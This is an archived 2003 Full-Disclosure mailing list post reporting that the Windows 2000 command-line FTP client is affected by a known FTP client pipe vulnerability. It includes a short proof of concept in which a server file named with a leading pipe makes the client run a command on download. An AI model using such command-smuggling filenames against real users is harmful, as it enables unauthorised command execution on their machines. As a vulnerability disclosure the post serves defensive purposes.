Securityfocus has a post on its website regarding this vulnerability in
many ftp clients. I've tested and subsequently validated this issue on
many of the platforms mentioned in their advisory. They mention
that the Netscape client on Windows 2000 Professional, but fails to
mention that the commandline ftp client included with win2k (server and
pro) are also vulnerable.
<-----------------------snip----------------------->
# Create file on ftp server for download by client.
schoe@ftp:/home/ftp$ touch \|touch\ file
# Start commandline ftp client on win2k.
Microsoft Windows 2000 [Version 5.00.2195]
<C> Copyright 1985-2000 Microsoft Corp.
C:\ ftp ftp.xxxx.com
....
ftp> get "|touch file.txt"
...
ftp> quit
221 Goodbye.
# "C:\file.txt" should now exist.
<-----------------------snap----------------------->
Multiple Vendor VTP pipe Vulnerability
======================================
www.securityfocus.com/bid/396/info
.-------------------------------------------.
| Sung J. Choe <schoe[at]oicinc.com>, TICSA |
| Systems Admin, Facility Security Officer |
.-------------------------------------------.---.
| Oceanic Imaging Consultants, Inc. |
| Phone #: (808) 539.3634 |
.-----------------------------------.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Tue Feb 25 2003 - 14:37:41 PST